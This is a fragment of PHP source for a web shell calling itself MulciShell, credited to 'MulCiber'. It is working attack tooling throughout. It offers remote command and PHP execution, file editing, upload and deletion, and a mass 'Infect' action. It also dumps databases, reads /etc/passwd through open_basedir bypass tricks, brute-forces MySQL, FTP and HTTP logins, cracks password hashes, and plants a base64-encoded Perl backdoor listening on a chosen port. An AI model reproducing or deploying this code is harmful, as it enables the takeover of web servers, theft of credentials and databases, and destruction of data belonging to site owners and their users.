@$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),3); @$write=is_writable($d.'/'.$f)?"Yes":"No";


@$mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f)); echo "<tr><td><a href='$self?act=f&file=$d/ $f'>$f</a></td><td>$size</td><td>$own/ $grp</td><td>$ch</td><td>$write</td><td>$mod</td><td><input type='checkbox' name='files[]' id='check' value='$d/$f'></td></tr>"; } echo "</table> <input type='button' style='background-color: none; border: 1px solid white;' value='Toggle' onClick='togglecheck()'></br> With checked file(s): <select name='fileaction'> <option name='chmod'>Chmod</option> <option name='delete'>Delete</option> <option name='infect'>Infect</option><input type='text' value='chmod value' name='cmodv'> </select> <br><input type='submit' value='Go' name='massfiles'></form>"; function SQLLogin() { global $self; if(!isset($_SESSION['log'])&&!isset($_POST['mconnect'])) { echo "<center><form action='$self?act=sql' method='post'> Host: <input type='text' value='localhost' name='mhost'> Username: <input type='text' value='root' name='muser'> Password: <input type='password' value='' name='mpass'> Port: <input type='text' style='width: 40px' value='3306' name='mport'> <input type='submit' value='Connect' name='mconnect'> </form> </center>"; } elseif(!isset($_SESSION['log'])&&isset($_POST['mconnect'])) { extract($_POST); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { $_SESSION['muser']=$muser; $_SESSION['mhost']=$mhost; $_SESSION['mpass']=$mpass; $_SESSION['mport']=$mport; $_SESSION['log']=true; header("Location: $self?act=sqledit"); } else echo "Failed to login with $muser@$mhost!<br>"; } else { header("Location: $self?act=sqledit"); } } function SQLEditor() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { echo "Logged in as $muser@$mhost <a href='$self? act=logout'>[Logout]</a><center>"; echo "<form method='POST' action='$self?'>


Quick SQL query: <input type='text' style='width: 300px' value='select * from users' name='sqlquery'> <input type='hidden' name='db' value='$_GET[db]'> <input type='submit' value='Go' name='sql'> </form>"; echo "<form action='$self?act=sqledit' method='post'> <input type='submit' style='border: none;' value='[ List Processes ]' name='sql_list_proc'> </form></center></br></br>"; if(isset($_POST['sql_list_proc'])) { $res=mysql_list_processes(); echo "<table style='margin: auto; text-align: center;'><tr> <td>Proc ID</td><td>Host</td><td>DB</td><td>Command</td><td>Time</td> </tr>"; while($r=mysql_fetch_assoc($res)) echo "<tr><td>$r[Id]</td><td>$r[Host]</td><td>$r[db]</td><td>$r[Command]</td><td>$r[Time ]</td></tr>"; mysql_free_result($res); echo "</table></br>"; } if(!isset($_GET['db'])) { if(isset($_POST['dbc'])) db_create(); if(isset($_GET['dropdb'])) SQLDrop(); echo "<table style='margin: auto; text-align: center;'> <tr><td>Database</td><td>Table count</td><td>Download</td><td>Drop</td></tr>"; $all_your_base=mysql_list_dbs($conn); while($your_base=mysql_fetch_assoc($all_your_base)) { $tbl=mysql_query("SHOW TABLES FROM $your_base[Database]"); $tbl_count=mysql_num_rows($tbl); echo "<tr><td><a href='$self? act=sqledit&db=$your_base[Database]'>$your_base[Database]</td><td>$tbl_count</td><t d><a href='$self?act=download&db=$your_base[Database]'>Download</a></td><td><a href='$self?act=sqledit&dropdb=$your_base[Database]'>Drop</a></td></tr>"; } echo "</table></br><center><form action='$self?act=sqledit' method='post'>New database name: <input type='text' value='new_database' name='db_name'><input type='submit' style='border: none;' value='[ Create Database ]' name='dbc'></form></center></br>"; } elseif(isset($_GET['db'])&&!isset($_GET['tbl'])) { if(isset($_POST['tblc'])) table_create(); if(isset($_GET['droptbl'])) SQLDrop(); echo "<table style='margin: auto; text-align: center;'> <tr><td>Table</td><td>Column count</td><td>Dump</td><td>Drop</td></tr>"; $tables=mysql_query("SHOW TABLES FROM $_GET[db]"); while($tblc=mysql_fetch_array($tables)) { $fCount=mysql_query("SHOW COLUMNS FROM $_GET[db].$tblc[0]"); $fc=mysql_num_rows($fCount); echo "<tr><td><a href='$self? act=sqledit&db=$_GET[db]&tbl=$tblc[0]'>$tblc[0]</a></td><td>$fc</td><td><a href='$self?act=download&db=$_GET[db]&tbl=$tblc[0]'>Dump</td><td><a href='$self?


act=sqledit&db=$_GET[db]&droptbl=$tblc[0]'>Drop</a></td></tr>"; } echo "</table></br><center><form action='$self? act=sqledit&db=$_GET[db]' method='post'>Create new table: <input type='text' value='new_table' name='table_name'><input type='hidden' value='$_GET[db]' name='db_current'> <input type='submit' style='border: none;' value='[ Create Table ]' name='tblc'></form></center>"; } elseif(isset($_GET['field'])&&isset($_POST['sqlsave'])) { $discard_values=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'"); $values=mysql_fetch_assoc($discard_values); $keys=array_keys($values); $values=array(); foreach($_POST as $k=>$v) if(in_array($k,$keys)) $values[]=$v; $query="UPDATE $_GET[db].$_GET[tbl] SET "; for($y=0;$y<count($values);$y++) { if($y==count($values)-1) $query.="$keys[$y]='$values[$y]' "; else $query.="$keys[$y]='$values[$y]', "; } $query.="WHERE $_GET[field] = '$_GET[v]'"; $try=mysql_query($query) or die(mysql_error()); echo "<center>Table updated!<br>"; echo "<a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]'>Go back</a><br><br>"; } elseif(isset($_GET['field'])&&isset($_GET['v'])&&!isset($_GET['del'])) { echo "<center><form action='$self? act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$_GET[field]&v=$_GET[v]' method='post'>"; $sql_fields=array(); $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($field=mysql_fetch_assoc($fields)) $sql_fields[]=$field['Field']; $data=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'"); $d_piece=mysql_fetch_assoc($data); for($m=0;$m<count($sql_fields);$m++) { $point=$sql_fields[$m]; echo "$point: <input type='text' value='$d_piece[$point]' name='$sql_fields[$m]'></br>"; } echo "<input type='submit' value='Save' name='sqlsave'></form></center>"; } elseif(isset($_GET['db'])&&isset($_GET['tbl'])) { if(isset($_GET['insert'])) SQLInsert(); if(isset($_GET['field'])&&isset($_GET['v'])&&isset($_GET['del'])) { echo "<center>";


if(@mysql_query("DELETE FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]=$_GET[v]")) echo "Row deleted</br>"; else echo "Failed to delete row</br>"; echo "</center>"; } echo "<center><a href='$self? act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&insert=1'>[Insert new row]</a></center>"; echo "<table style='margin: auto; text-align: center;'><tr>"; $cols=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); $fields=array(); while($col=mysql_fetch_assoc($cols)) { array_push($fields,$col['Field']); echo "<td>$col[Field]</td>"; } echo "</tr>"; if(isset($_GET['s'])&&is_numeric($_GET['s'])) {$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT $_GET[s], 250");} else {$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT 0, 250");} while($select=mysql_fetch_row($selector)) { echo "<tr>"; for($i=0;$i<count($fields);$i++) { echo "<td>".htmlspecialchars($select[$i])."</td>"; } echo "<td><a href='$self? act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$fields[0]&v=$select[0]'>Edit</a></td ><td><a href='$self? act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$fields[0]&v=$select[0]&del=true'>Del ete</a></td>"; echo "</tr>"; } echo "</table>"; echo "<table style='margin: auto;'>"; if(isset($_GET['s'])) { $prev=intval($_GET['s'])-250; $next=intval($_GET['s'])+250; if($_GET['s']>0) echo "<tr><td><a href='$self? act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=$prev'>Previous</a></td>"; if(mysql_num_rows($selector)>249) echo "<td><a href='$self? act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=$next'>Next</a></td></tr>"; } else echo "<center><a href='$self? act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=250'>Next</a></center>"; echo "</table>"; } else { $_SESSION=array(); session_destroy(); header("Location: $self?act=sql"); }


} } function SQLDownload() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(isset($_GET['db'])&&!isset($_GET['tbl'])) { $tables=array(); $dump_file="##################SQL Database dump####################\n"; $dump_file.="######################Dumped by: MulciShell v0.2#####################\n\n"; $get_tables=mysql_query("SHOW TABLES FROM $_GET[db]"); while($current_table=mysql_fetch_array($get_tables)) $tables[]=$current_table[0]; foreach($tables as $table_dump) { $data_selection=mysql_query("SELECT * FROM $_GET[db].$table_dump"); while($current_data=mysql_fetch_assoc($data_selection)) { $fields=implode("`, `", array_keys($current_data)); $values=implode("`, `",array_values($current_data)); $dump_file.="INSERT INTO `$table_dump` ($fields) VALUES ($values); "; } } } elseif(isset($_GET['db'])&&isset($_GET['tbl'])) { $dump_file="##################SQL Database dump####################\n"; $dump_file.="######################Dumped by: MulciShell v0.2#####################\n"; $table_dump=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl]"); while($table_data=mysql_fetch_assoc($table_dump)) { $fields=implode("`, `",array_keys($table_data)); $values=implode("`, `",array_values($table_data)); $dump_file.="INSERT INTO `$_GET[db].$_GET[tbl]` ($fields) VALUES ($values`)\n"; } } else { echo "Invalid!"; } } $dump_file.="###################################################################### ##################"; if(!isset($_GET['tbl'])) $file_name="$_GET[db]"."_DUMP.sql"; else $file_name="$_GET[db]"."_$_GET[tbl]"."_DUMP.sql"; ob_get_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($dump_file)); header("Content-disposition: attachment; filename=$file_name;"); echo $dump_file; exit; } function SqlInsert()


{

extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(!isset($_POST['sql_insert'])) { echo "<form action='$self? act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&insert=1' method='post'><center>"; $sql_fields=array(); $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field']; for($s=0;$s<count($sql_fields);$s++) echo "$sql_fields[$s]: <input type='text' name='$sql_fields[$s]'></br>"; echo "<input type='submit' value='Insert' name='sql_insert'></center></form>"; } else { $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field']; $values=array(); $keys=array(); $query="INSERT INTO $_GET[db].$_GET[tbl] ("; foreach($_POST as $k=>$v) { if(in_array($k,$sql_fields)&&!empty($v)) { $values[]=$v; $keys[]=$k; } } for($k=0;$k<count($keys);$k++) { if($k==count($keys)-1) $query.="`$keys[$k]`"; else $query.="`$keys[$k]`,"; } $query.=") VALUES ("; for($v=0;$v<count($values);$v++) { if($v==count($values)-1) $query.="'$values[$v]'"; else $query.="'$values[$v]',"; } $query.=")"; echo "<center>"; if(@mysql_query($query)) echo "Row inserted</br>"; else echo "Failed to insert row</br>"; echo "</center>"; } } } function SQLDrop() { echo "<center>"; extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) {


if(!isset($_GET['droptbl'])) { $query="DROP DATABASE $_GET[dropdb]"; if(@mysql_query($query)) echo "Database $_GET[dropdb] has been dropped<br>"; else echo "Failed to drop database $_GET[dropdb]<br>"; } elseif(isset($_GET['db'])&&isset($_GET['droptbl'])) { $query="DELETE FROM $_GET[db].$_GET[droptbl]"; if(@mysql_query($query)) echo "Table $_GET[droptbl] has been dropped<br>"; else echo "Failed to drop table $_GET[droptbl]<br>"; } else { echo "Invalid request<br>"; } } else echo "Failed to connect<br>"; echo "</center>"; } function db_create() { echo "<center>"; if(isset($_POST['db_name']) && !empty($_POST['db_name'])) { extract($_SESSION); @$conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(@mysql_query("CREATE DATABASE $_POST[db_name]")) echo "Status: Database $_POST[db_name] created!"; else echo "Failed to create database $_POST[db_name]</br>"; } else echo "Failed to connect</br>"; } else echo "Enter a DB name</br>"; echo "</cenetr>"; } function table_create() { echo "<center>"; if(isset($_POST['table_name'])&&!empty($_POST['table_name'])) { extract($_SESSION); @$conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { @mysql_select_db($_POST['db_current']); if(@mysql_query("CREATE TABLE `$_POST[table_name]` (`TEMPORARY` TEXT NOT NULL)")) echo "Status: Table $_POST[table_name] created!"; else echo "Failed to create table $_POST[table_name]"; } else echo "Failed to connect!</br>"; } else echo "Enter a table name</br>"; echo "</center>"; } function FileEditor() { if(isset($_GET['file'])) $file=$_GET['file']; elseif(isset($_POST['nfile'])) $file=$_POST['nfile']; elseif(isset($_POST['editfile'])) $file=$_POST['editfile'];


if(@!file_exists($file)) die("Permission denied!"); if(isset($_POST['dfile'])) { @$fh=fopen($file,'r'); @$buffer=fread($fh,filesize($file)); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($buffer)); header("Content-disposition: attachment; filename=".basename($file).';'); @ob_get_clean(); echo $buffer; @fclose($fh); } elseif(isset($_POST['delfile'])) { if(!unlink(str_replace("//","/",$file))) echo "Failed to delete file!<br>"; else echo "File deleted<br>"; } elseif(isset($_POST['sfile'])) { $fh=@fopen($file,'w') or die("Failed to open file for editing!"); @fwrite($fh,stripslashes($_POST['file_contents']),strlen($_POST['file_contents'])); echo "File saved!"; @fclose($fh); } else { $fh=@fopen($file,'r'); echo "<center> <form action='$self?act=f' method='post'> File to edit: <input type='text' style='width: 300px' value='$file' name='nfile'> <input type='submit' value='Go' name='gfile'></br></br>"; echo "<textarea rows='20' cols='150' name='file_contents'>".htmlspecialchars(@fread($fh,filesize($file)))."</textarea></ br></br>"; echo "<input type='submit' value='Save file' name='sfile'> <input type='submit' value='Download file' name='dfile'> <input type='submit' value='Delete file' name='delfile'> </center></form>"; @fclose($fh); } } function security_bypass() { if(isset($_POST['curl_bypass'])) { $ch=curl_init("file://$_POST[file_bypass]"); curl_setopt($ch,CURLOPT_HEADERS,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $file_out=curl_exec($ch); curl_close($ch); echo "<textarea rows='20' cols='150' readonly>".htmlspecialchars($file_out)."</textarea></br></br>"; } elseif(isset($_POST['tmp_bypass'])) { tempnam("/home/",$_POST['file_passwd']); }


elseif(isset($_POST['copy_bypass'])) { if(@copy($_POST['file_bypass'],$_POST['dest'])) { echo "File successfully copied!</br>"; @$fh=fopen($_POST['dest'],'r'); echo "<textarea rows='20' cols='150' readonly>".htmlspecialchars(@fread($fh,filesize($_POST['dest'])))."</textarea></br> </br>"; @fclose($fh); } else echo "Failed to copy file</br>"; } elseif(isset($_POST['include_bypass'])) { if(file_exists($_POST['file_bypass'])) { echo "<textarea rows='20' cols='150' readonly>"; @include($_POST['file_bypass']); echo "</textarea>"; } } elseif(isset($_POST['sql_bypass'])) { extract($_SESSION); $conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { mysql_select_db($_POST['sql_db']); mysql_query("CREATE TABLE `$_POST[tmp_table]` (`File` TEXT NOT NULL);"); mysql_query("LOAD DATA INFILE \"$_POST[sql_file]\" INTO TABLE $_POST[tmp_table]") or die(mysql_error()); $res=mysql_query("SELECT * FROM $_POST[tmp_table]"); if(mysql_num_rows($res)<1) die("Failed to retrieve file contents!"); if($res) { while($row=mysql_fetch_array($res)) $f.="$row[0]</br>"; echo $f; } mysql_query("DROP TABLE $_POST[tmp_table]"); } } echo "<table style='margin: auto; width: 100%; text-align: center;'><tr><td colspan='2'>Security (open_basedir) bypassers</td></tr> <tr><td>Bypass using cURL</td><td>Bypass using tempnam()</td></tr> <tr><td><form action='$self?act=bypass' method='post' name='bypasser'>Read file: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='curl_bypass' value='Bypass'></form></td><td><form action='$self?act=bypass' method='post' name='bypasser'>Write file: <input type='text' value='../../../etc/passwd' name='file_bypass'><input type='submit' name='tmp_bypass' value='Bypass'></form></td></tr> <tr><td>Bypass using copy()</td><td>Bypass using include()</td></tr> <tr><td><form action='$self?act=bypass' method='post' name='bypasser'>Copy to: <input type='text' style='width: 250px;' name='dest' value='".CleanDir(getcwd())."/copy.php'></br> File to copy: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='copy_bypass' value='Bypass'></form></td><td><form action='$self?act=bypass' method='post' name='bypasser'>Path to file: <input type='text' value='/etc/passwd'


name='file_bypass'><input type='submit' name='include_bypass' value='Bypass'></form></td></tr> <tr><td colspan='2'>Bypass using SQL LOAD INFILE [Login to SQL server first]</td></tr> <tr><td colspan='2'><form action='$self?act=bypass' method='post' name='bypasser'>[Existing] Database to store temporary table: <input type='text' value='tmp_database' name='sql_db'></br>Temporary table: <input type='text' value='tmp_file' name='tmp_table'></br><input type='text' value='/etc/passwd' name='sql_file'><input type='submit' name='sql_bypass' value='Bypass'></form></td></tr> </table>"; } function brute_force() { echo "<form action='$self' method='post' enctype='multipart/form-data'><input type='hidden' name='docrack'><table style='margin: auto; width: 100%; text-align: center;'><tr><td colspan='2'>Password crackers</td></tr> <tr><td>MD5 Cracker</td><td>SHA1 Cracker</td></tr> <tr><td>Hash: <input type='text' name='md5hash'><input type='submit' value='Crack' name='md5crack'></td><td>Hash: <input type='text' name='sha1hash'><input type='submit' value='Crack' name='sha1crack'></td></tr> <tr><td>VBulletin Salt Cracker</td><td>SMF Salt cracker</td></tr> <tr><td>Hash: <input type='text' name='vbhash'></br>Salt: <input type='text' name='vbsalt' salt='#7A'></br><input type='submit' value='Crack' name='vbcrack'></td><td>Hash: <input type='text' name='smfhash'></br>Salt: <input type='text' name='smfsalt'></br><input type='submit' value='Crack' name='smfcrack'></td></tr> <tr><td>MySQL Brute Force</td><td>FTP Brute Force</td></tr> <tr><td>User: <input type='text' value='root' name='mysql_user'></br>Host: <input type='text' value='localhost' name='mysql_host'></br>Port: <input type='text' value='3306' name='mysql_port'></br><input type='submit' value='Brute' name='mysqlcrack'></td><td>User: <input type='text' value='root' name='ftp_user'></br>Host: <input type='text' value='localhost' name='ftp_host'></br>Port: <input type='text' value='21' name='ftp_port'></br>Timeout: <input type='text' value='5' name='ftp_timeout'></br><input type='submit' value='Brute' name='ftpcrack'></td></tr> <tr><td>Remote login Brute Force</td><td>HTTP-Auth Brute Force</td></tr> <tr><td>Login form: <input type='text' value='' name='remote_login_target'></br>Username: <input type='text' value='admin' name='remote_login_user'><input type='submit' value='Brute' name='remote_login'></td><td>Username: <input type='text' name='auth_user' value='porn_user101'></br>Auth URL: <input type='text' name='auth_url'><input type='submit' value='Brute' name='authcrack'></td></tr> <tr><td colspan='2'>Wordlist</td></tr> <tr><td colspan='2'><input type='file' name='wordlist'></br></br><b>Notice: Be sure to check the max POST length allowed</b></td></tr> </br></table></form>"; } function BackDoor() { global $backdoor_perl; global $disable; if(!isset($_POST['backdoor_host'])) { echo "<center><form action='$self?act=bh' method='post'> Port: <input type='text' name='port'> <input type='submit' name='backdoor_host' value='Backdoor'></center>"; } else {


@$fh=fopen("shbd.pl","w"); @fwrite($fh,base64_decode($backdoor_perl)); @fclose($fh); execmd("perl shbd.pl $_POST[port]",$disable); echo "Server backdoor'd</br>";

} } function sql_rep_search($dir) { global $self; $ext=array(".db",".sql"); @$dh=opendir($dir); while((@$file=readdir($dh))) { $ex=strrchr($file,'.'); if(in_array($ex,$ext)&&$file!="Thumbs.db"&&$file!="thumbs.db") echo "<tr><td><center><a href='$self? act=f&file=$dir"."$file'>$dir"."$file</center></td></tr>"; if(is_dir($dir.$file)&&$file!='..'&&$file!='.') { if(!preg_match("/\/public_html\//",$dir)) sql_rep_search($dir.$file.'/public_html/'); else sql_rep_search($dir.$file); } } @closedir($dh); } function database_tools() { if(isset($_POST['sql_start_search'])) { echo "<center><table style='width: auto;'><tr><td><center><font color='#FF0000'>Databases</font></center></td></tr>"; sql_rep_search("/home/"); echo "</table></center>"; } $colarr=array(); if(isset($_POST['db_parse'])) { if(!is_file($_FILES['db_upath']['tmp_name'])&&empty($_POST['db_dpath'])) die("Please specify a DB to parse..."); $db_meth=empty($_POST['db_dpath'])?'uploaded':'path'; $q_delimit=$_POST['q_delimit']; if(isset($_POST['column_defined'])) { switch($_POST['column_type']) { case 'SMF': break; case 'phpbb': break; case 'vbulletin': $colarr=array(4,5,7,48); break; } } else { $strr=str_replace(", ",",",trim($_POST['db_columns'])); $colarr=explode(",",$strr);


} switch($db_meth) { case 'uploaded': @$fh=fopen($_FILES['db_upath']['tmp_name'],'r') or die("Failed to open file for reading"); break; case 'path': @$fh=fopen($_POST['db_dpath'],'r') or die("Failed to open file for reading"); break; } echo "Parsing database contents...</br>"; while(!feof($fh)) { $c_line=fgets($fh); $strr=str_replace(", ",",",$c_line); $arr=explode(',',$strr); for($i=0;$i<count($colarr);$i++) { $index=$colarr[$i]; if(empty($arr[$index])) continue; $spos=strpos("$_POST[q_delimit]",$arr[$index]); $spos=strpos("$_POST[q_delimit]",$arr[$index],$spos); if($i!==count($colarr)-1) echo "$arr[$index] : "; else echo "$arr[$index]</br>"; } continue; } @fclose($fh); } echo "<table style='width: 100%; margin: auto; text-align: center'> <tr><td colspan='2'>Database parser</td></tr> <tr><td> <form action='$self?act=dbs' method='post' enctype='multipart/form-data'> Quote delimiter (usually ` or '): <input type='text' style='width: 20px' name='q_delimit' value='`'> Columns to retrieve (separate by commas): <input type='text' style='width: 200px' name='db_columns' value='3,5,10'></br> Use predefined column match (user+pass+salt): <input type='checkbox' name='column_defined'> <select name='column_type'> <option value='vbulletin'>VBulletin</option><option value='SMF'>SMF</option><option value='phpbb'>PHPBB</option> </select></br> Path to DB dump: <input type='text' style='width: 300px' value='/home/someuser/public_html/backup.db' name='db_dpath'> </br>Upload DB dump: <input type='file' style='width: 300px' value='' name='db_upath'> </br></br><input type='submit' style='width: 300px' value='Parse Database' name='db_parse'></td></tr> <tr><td colspan='2'>Find database Backups</td></tr> <tr><td>Only search within local path: <input type='checkbox' name='sql_search_local'> <input type='submit' value='Go' name='sql_start_search'></br></td></tr> </table>"; } function show_tools() { echo "<form action='$self' method='post'>


<table style='width: 100%; margin: auto; text-align: center'> <tr><td colspan='2'>Tools</td></tr> <tr><td>Forum locator</td><td>Config locator</td></tr> <tr><td><form action='$self' method='post'>Passwd file: <input type='text' value='/etc/passwd' name='passwd'><input type='submit' value='Find forums' name='find_forums'></form></td><td><form action='$self' method='post'>Passwd file: <input type='text' value='/etc/passwd' name='passwd'><input type='submit' value='Find forums' name='find_configs'></form></td></tr> <tr><td>Port scanner</td><td>Search</td></tr> <tr><td><form action='$self' method='post'>Host: Start port: <input type='text' value='localhost' name='host'></br>Start port: <input type='text' value='80' style='width: 50px' name='sport'> End Port: <input type'text' style='width: 50px' value='1000' name='eport'></br><input type='submit' value='Scan' name='port_scan'>Using: <select name='type'><option value='php'>PHP</option><option value='perl'>Perl</option></select></form></td><td>Finish this next</td></tr> </table>"; } function TrueSize($s) { if(!$s) return 0; if($s>=1073741824) return(round($s/1073741824)." GB"); elseif($s>=1048576) return(round($s/1048576)." MB"); elseif($s>=1024) return(round($s/1024)." KB"); else return($s." B"); } function CleanDir($d) { $d=str_replace("\\","/",$d); $d=str_replace("//","/",$d); return $d; } function Trail($d) { $d=explode('/',$d); array_pop($d); array_pop($d); $str=implode($d,'/'); return $str; } function Encoder() { echo "<form action='$self?' method='post'> <center> Input: <input type='text' style='width: 300px' name='encrypt'> <br><input type='submit' value='Encrypt' name='encryption'> </center> </form>"; } $relpath=(isset($_GET['d']))?CleanDir($_GET['d']):CleanDir(realpath(getcwd())); if(isset($_GET['d'])) $self.="?d=$_GET[d]"; echo "<table style='text-align: center; width: 100%'> <tr><td colspan='2'>Execute command</td></tr> <tr><td colspan='2'><form action='$self?' method='post'><input type='text' style='width: 600px' value='whoami' name='cmd'><input type='submit' name='execmd' value='Execute'></form></td></tr> <tr><td colspan='2'>Execute PHP</td></tr> <tr><td colspan='2'><form action='$self' method='post'><textarea rows='2' cols='80' name='phpcode' style='background-color: black;'>//Don't include PHP tags</textarea><input type='submit' name='execphp'


value='Execute'></form></td></tr> <tr><td>Create directory</td><td>Create file</td></tr> <tr><td><form action='$self' method='post'><input type='text' style='width: 250px' value='$relpath/sikreet/' name='newdir'><input type='submit' value='Create' name='cnewdir'></form></td><td><form action='$self' method='post'><input type='text' style='width: 250px' value='$relpath/index2.php' name='newfile'><input type='submit' value='Create' name='cnewfile'></form></td></tr> <tr><td>Enter directory</td><td>Edit file</td></tr> <tr><td><form action='$self' method='post'><input type='text' style='width: 225px' name='godir'><input type='submit' value='Go' name='enterdir'></form></td><td><form action='$self' method='post'><input type='text' style='width: 255px' value='/etc/passwd' name='editfile'><input type='submit' name='doeditfile' value='Go'></form></td></tr> <tr><td>Upload file</td><td>Wget file</td></tr> <tr><td><form action='$self' method='post' enctype='multipart/form-data'>Save location: <input type='text' style='width: 300px' value='$relpath' name='u_location'></br><input type='file' name='u_file'><input type='submit' value='Upload' name='doUpload'></form></td><td><form action='$self' method='post'><input type='text' style='width: 255px' value='http://www.site.com/image1.jpg' name='wgetfile'><input type='submit' name='dogetfile' value='Go'></form</td></tr> <tr><td colspan='2'>Switch theme: <a href='$self?theme=green'>Matrix Green</a>, <a href='$self?theme=uplink'>Uplink Blue</a>, <a href='$self? theme=dark'>Dark</a></td></tr> </table> </br></br><div id='bar'><center>Shell [version 2.0] created by <font color='red'><b>[MulCiber]</font> | Page generated in : <font color='red'>".round(microtime()-$start,2)." seconds</font></center></div></body></html>"; ob_end_flush(); ?>


hhhhhhhhhhhhhhh